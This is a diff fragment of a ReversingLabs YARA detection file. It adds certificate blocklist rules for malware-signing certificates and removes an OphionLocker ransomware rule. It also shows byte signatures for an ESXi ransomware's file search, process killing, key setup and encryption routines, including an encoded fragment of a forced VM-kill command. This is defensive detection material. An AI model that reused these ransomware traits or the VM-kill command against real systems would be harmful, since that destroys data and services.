8D B3 ?? ?? ?? ?? C7 44 24 ?? 6F 63 65 73 F3 A5 8D B4 24 ?? ?? ?? ?? - C7 44 24 ?? 73 20 6B 69 83 EC ?? 89 F7 C7 44 24 ?? 6C 6C 20 2D C7 44 24 ?? 2D 74 79 - 70 C7 44 24 ?? 65 3D 66 6F C7 44 24 ?? 72 63 65 20 C7 44 24 ?? 2D 2D 77 6F 89 C8 B9 - ?? ?? ?? ?? C7 44 24 ?? 72 6C 64 2D C7 44 24 ?? 69 64 3D 22 C7 84 24 ?? ?? ?? ?? 25 - 73 22 00 C7 44 24 ?? 5B 45 53 58 C7 44 24 ?? 69 5D 20 53 C7 44 24 ?? 68 75 74 74 C7 - 44 24 ?? 69 6E 67 20 C7 44 24 ?? 64 6F 77 6E F3 AB C7 44 24 ?? 20 2D 20 25 8D 83 ?? - ?? ?? ?? 66 89 6C 24 ?? C6 44 24 ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 89 C5 8D 44 24 ?? 66 89 7C 24 ?? 31 FF - } - $kill_processes_v2_p1 = { - 41 54 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 E4 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 55 48 89 - FD 53 48 81 EC ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 48 89 84 24 ?? ?? ?? ?? B8 ?? ?? - ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F - 6F 05 ?? ?? 00 00 48 89 DF 66 89 44 24 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 44 24 - ?? 66 0F 6F 05 ?? ?? 00 00 66 89 54 24 ?? 48 89 EA 0F 29 44 24 ?? 66 0F 6F 05 ?? ?? - 00 00 66 89 8C 24 ?? ?? 00 00 B9 ?? ?? ?? ?? 0F 29 44 24 ?? 66 0F 6F 05 ?? ?? 00 00 - C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6 - 84 24 ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C7 44 24 ?? ?? - ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6 44 24 ?? ?? 0F 29 84 24 - ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ?? - ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 B8 - } - $kill_processes_v2_p2 = { - 48 89 44 24 ?? 4C 89 E0 F3 48 AB 48 89 DF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? - ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? - ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 - ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D - 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF - B9 ?? ?? ?? ?? F3 48 AB 48 8D B4 24 ?? ?? ?? ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 - 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 - EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? - F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 - 81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3 - } - $encrypt_files_v2_p1 = { - 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 41 57 66 0F EF C0 49 89 FF 41 56 49 89 D6 41 55 49 89 - F5 BE ?? ?? ?? ?? 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 4C 24 ?? 48 - 8D AC 24 ?? ?? ?? ?? 48 89 DF 4C 89 04 24 0F 29 44 24 ?? 0F 29 44 24 ?? 0F 29 44 24 - ?? 48 C7 44 24 ?? ?? ?? ?? ?? 0F 29 44 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75 - ?? 45 31 E4 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF BE ?? ?? ?? ?? E8 ?? ?? - ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 44 89 E0 5B 5D - 41 5C 41 5D 41 5E 41 5F C3 0F 1F 80 ?? ?? ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ?? - ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? - ?? 4C 89 FF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 89 FF E8 ?? - ?? ?? ?? 4C 89 FE 4C 89 EF 48 89 C2 49 89 C4 E8 ?? ?? ?? ?? 8B 54 24 ?? 4B 8D 44 25 - ?? 31 F6 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? BA ?? ?? ?? ?? 43 - C6 44 25 ?? ?? 4C 8B 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 ?? 45 31 - E4 E8 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? 4C 89 EE 4C 89 FF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 - 8B 7C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8B 7C 24 ?? E8 ?? ?? - ?? ?? 48 8D 35 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 89 44 24 ?? 49 89 C4 48 85 C0 - } - $encrypt_files_v2_p2 = { - 0F 84 ?? ?? ?? ?? 31 F6 BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 - ?? E8 ?? ?? ?? ?? 48 39 44 24 ?? 48 0F 4E 44 24 ?? 48 8D 7C 24 ?? 48 89 C1 48 C1 F9 - ?? 48 C1 E9 ?? 48 8D 14 08 83 E2 ?? 48 29 CA 48 29 D0 48 89 44 24 ?? E8 ?? ?? ?? ?? - 48 8D BC 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DE 48 89 44 24 ?? 31 C0 BA ?? ?? ?? ?? - F3 48 AB 48 8D 84 24 ?? ?? ?? ?? 48 8B 3C 24 48 89 C1 48 89 44 24 ?? E8 ?? ?? ?? ?? - 41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 4C 89 - EE E8 ?? ?? ?? ?? 41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 4C 8D 64 24 ?? 48 - 85 C0 75 ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 4D 89 F1 4D 89 E8 4C 89 E9 4C 89 E2 - 48 89 EE 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F6 BA ?? ?? ?? ?? 4C 89 FF 48 F7 - DE E8 ?? ?? ?? ?? 4C 89 F9 4C 89 F2 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44 - 24 ?? 4C 29 F0 48 89 44 24 ?? 74 ?? 49 39 C6 4C 8B 7C 24 ?? BE ?? ?? ?? ?? 4C 89 EF - 4C 0F 47 F0 66 0F 6F 4C 24 ?? 4C 89 F9 4C 89 F2 0F 29 4C 24 ?? E8 ?? ?? ?? ?? 4C 39 - F0 74 ?? 48 8B 7C 24 ?? 41 BC ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FE 4C - 89 EF E8 ?? ?? ?? ?? E9 - } - $find_files_v2_p1 = { - 41 57 4D 89 C7 41 56 49 89 FE 41 55 49 89 FD 41 54 55 53 89 CB 48 81 EC ?? ?? ?? ?? - 48 89 34 24 89 54 24 ?? 41 8B 55 ?? 49 83 C5 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? - ?? ?? ?? 74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 49 8D 55 ?? 4C 0F 44 EA 89 C6 - 40 00 C6 49 83 DD ?? 31 ED 4D 29 F5 74 ?? 49 8D 6D ?? 43 80 7C 2E ?? ?? 49 0F 45 ED - 48 8D 44 24 ?? 41 89 DC 4C 89 F6 48 89 44 24 ?? 48 89 C2 BF ?? ?? ?? ?? 41 83 E4 ?? - 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 00 83 F8 - ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? 48 8B 44 24 ?? F6 C3 - ?? 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C 89 7C 24 ?? 48 89 44 24 ?? 4D - 85 FF 0F 84 ?? ?? ?? ?? 41 8B 47 ?? 8D 55 ?? 89 54 24 ?? 83 C0 ?? 89 44 24 ?? 89 44 - 24 ?? 41 8B 47 ?? 89 44 24 ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ?? - ?? ?? 89 D8 83 E0 ?? 89 44 24 ?? 75 ?? 44 88 5C 24 ?? 44 89 E2 48 8D 4C 24 ?? 4C 89 - F7 48 8B 74 24 ?? 48 8B 04 24 44 89 44 24 ?? FF D0 44 8B 44 24 ?? 44 0F B6 5C 24 ?? - 85 C0 89 C2 75 ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 54 24 ?? EB ?? 0F - 1F 44 00 ?? 4D 8B 3F 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 49 39 57 ?? 75 ?? - 31 D2 48 81 C4 ?? ?? ?? ?? 89 D0 5B 5D 41 5C 41 5D 41 5E 41 5F C3 66 90 E8 ?? ?? ?? - ?? 85 C0 78 ?? 8B 44 24 ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? - ?? ?? 0F 84 ?? ?? ?? ?? 31 C9 45 31 DB 45 31 E4 48 8B 44 24 ?? F6 C3 ?? 0F 84 ?? ?? - ?? ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C - } - $find_files_v2_p2 = { - 89 7C 24 ?? 48 89 44 24 ?? E9 ?? ?? ?? ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 E8 ?? ?? ?? - ?? 49 89 C4 8B 00 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 4C 89 F6 BF ?? ?? ?? ?? - E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? EB - ?? 0F 1F 00 8B 4C 24 ?? 85 C9 74 ?? 45 84 DB 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 43 C6 04 - 2E ?? 85 C0 0F 84 ?? ?? ?? ?? 44 89 E2 48 8D 4C 24 ?? 48 8B 74 24 ?? 4C 89 F7 48 8B - 04 24 FF D0 89 C2 E9 ?? ?? ?? ?? 90 31 F6 4C 89 F7 31 C0 44 88 5C 24 ?? E8 ?? ?? ?? - ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 44 0F B6 5C 24 ?? 44 8B 00 85 FF 79 ?? 41 - 83 F8 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ?? ?? ?? 44 0F 45 DA 44 0F 45 E0 8B 74 - 24 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 7C 24 ?? 44 88 5C 24 ?? 44 89 44 24 ?? E8 ?? ?? ?? - ?? 44 0F B6 5C 24 ?? 44 8B 44 24 ?? E9 ?? ?? ?? ?? 0F 1F 00 48 89 44 24 ?? 48 8B 44 - 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 - 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 85 ED 74 ?? 41 80 3C 2E ?? 48 89 E8 74 ?? E9 ?? - ?? ?? ?? 0F 1F 44 00 ?? 41 80 3C 06 ?? 0F 85 ?? ?? ?? ?? 48 83 E8 ?? 75 ?? 31 D2 89 - } - $find_files_v2_p3 = { - 54 24 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 89 D8 B9 ?? ?? ?? ?? 41 BB ?? ?? ?? ?? 83 E0 ?? - 83 F8 ?? 45 19 E4 41 83 E4 ?? 41 83 C4 ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? 8B 54 24 ?? - 85 D2 0F 88 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 49 89 C7 48 85 C0 0F 84 ?? ?? ?? - ?? B8 ?? ?? ?? ?? 44 89 64 24 ?? 4C 29 E8 48 89 44 24 ?? 48 8D 44 24 ?? 48 89 44 24 - ?? 8B 44 24 ?? 83 E8 ?? 89 44 24 ?? 4C 89 FF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? - ?? 80 78 ?? ?? 74 ?? 4C 8D 60 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 3B 44 24 ?? 0F 83 ?? ?? - ?? ?? 41 C6 04 2E ?? 49 8D 7C 2E ?? 4C 89 E6 E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 8B 54 24 - ?? 89 D9 48 8B 34 24 4C 89 F7 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 FF 89 04 24 E8 ?? ?? - ?? ?? 8B 14 24 E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 74 ?? 66 83 78 ?? ?? 75 ?? EB ?? 90 - 41 80 7C 06 ?? ?? 48 8D 70 ?? 89 C2 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41 - 80 7C 06 ?? ?? 48 8D 50 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 48 89 C2 48 85 D2 0F 84 - ?? ?? ?? ?? 41 80 7C 16 ?? ?? 48 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 00 45 85 E4 0F - 84 ?? ?? ?? ?? 31 C9 45 31 DB 41 BC ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FF 44 8B 64 24 - ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 41 8B 04 24 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 FF - C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ?? - ?? ?? ?? 48 89 F2 E9 ?? ?? ?? ?? 44 89 04 24 E8 ?? ?? ?? ?? 44 8B 04 24 BA ?? ?? ?? - ?? 44 89 00 E9 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 83 CA ?? E9 - } - $init_key_v2 = { - 48 85 FF 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41 56 41 55 41 54 55 48 89 F5 - 53 48 89 FB 48 81 EC ?? ?? ?? ?? 4C 8D 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? - 66 0F EF C0 48 8D 35 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 49 89 E6 0F 29 04 24 0F 29 44 - 24 ?? E8 ?? ?? ?? ?? 49 89 C5 48 85 C0 74 ?? 4C 89 F7 48 89 C1 BA ?? ?? ?? ?? BE ?? - ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 F6 4C 89 E7 E8 - ?? ?? ?? ?? 85 C0 74 ?? 31 C0 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3 66 2E - 0F 1F 84 00 ?? ?? 00 00 31 C0 C3 0F 1F 44 00 ?? 48 89 EA 48 89 DE 4C 89 E7 E8 ?? ?? - ?? ?? 85 C0 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 89 E8 EB - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="42:2a:b7:1a:c7:fb:12:5a:d7:17:1b:0c:99:51:0b:0e" and 1475193600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6F18946E5B773B7E32D9E7B4Fb8D434C : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "53205508-568c-5356-9717-2915c8f3806c" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16980-L16996" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fa285c17b43d1acdb05888074ecb16047209ade8f7f6191274f58eca7438dadf" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint32(0)==0x464C457F and ((( all of ($find_files_v1_p*)) and ( all of ($kill_processes_v1_p*)) and ($init_key_v1) and ( all of ($encrypt_files_v1_p*)) and ($shut_down_esxi_v1)) or (( all of ($find_files_v2_p*)) and ( all of ($kill_processes_v2_p*)) and ($init_key_v2) and ( all of ($encrypt_files_v2_p*)))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VECTOR LLC (VEKTOR, OOO)" and pe.signatures[i].serial=="6f:18:94:6e:5b:77:3b:7e:32:d9:e7:b4:fb:8d:43:4c" and 1454716800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Ophionlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3596Dfc23B9A42C66700982250Da2906 : INFO FILE { meta: - description = "Yara rule that detects OphionLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "75335749-66bd-539e-92b3-dd92c0b332d8" - date = "2020-07-15" - modified = "2020-07-15" + id = "15c3551f-7b08-5e7f-a540-68b3eccac316" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.OphionLocker.yara#L1-L105" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3c54a948a6a45ec5f5bc32fbbdbc8822f402b1332e9109b20b90635464dbe2ac" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16998-L17014" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1b69bf520fde5255069cf8752d5c67716e9bc297ddde1566551a563a563197ea" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "OphionLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $ol_do_filetypes_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 33 DB 53 89 5D ?? 53 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - } - $ol_do_filetypes_2 = { - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 89 5D ?? 50 - 8D 85 ?? ?? ?? ?? 89 5D ?? 50 53 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 - ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 8D 75 ?? 50 E8 ?? ?? - ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 58 89 45 ?? 89 5D ?? 88 5D ?? 89 45 ?? 89 - 5D ?? 88 5D ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 8B 39 E9 00 01 00 00 8B 77 ?? - 8D 47 ?? 89 45 ?? 3B 77 ?? 0F 84 EC 00 00 00 8B F8 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 50 8D 4D ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 4D - } - $ol_do_filetypes_3 = { - ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? - 89 65 ?? 8D 45 ?? 83 EC ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? - 81 C4 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ?? - ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 83 C4 ?? 3B 77 ?? 0F - 85 1C FF FF FF 8B 4D ?? 8B 7D ?? 8B 3F 89 7D ?? 3B F9 0F 85 F5 FE FF FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 - ?? ?? 8D 85 ?? ?? ?? ?? 89 65 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ?? ?? ?? ?? C6 45 - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B - CC E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 33 F6 8D 8D - ?? ?? ?? ?? 53 46 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 53 56 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ?? - ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C3 - } - $ol_ecies_key_1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 8B F9 33 DB 89 5D ?? 8D 8D ?? ?? ?? ?? 89 7D ?? 89 5D ?? E8 ?? - ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 46 8D 8D ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 89 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B - CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? - ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 50 56 FF 75 ?? 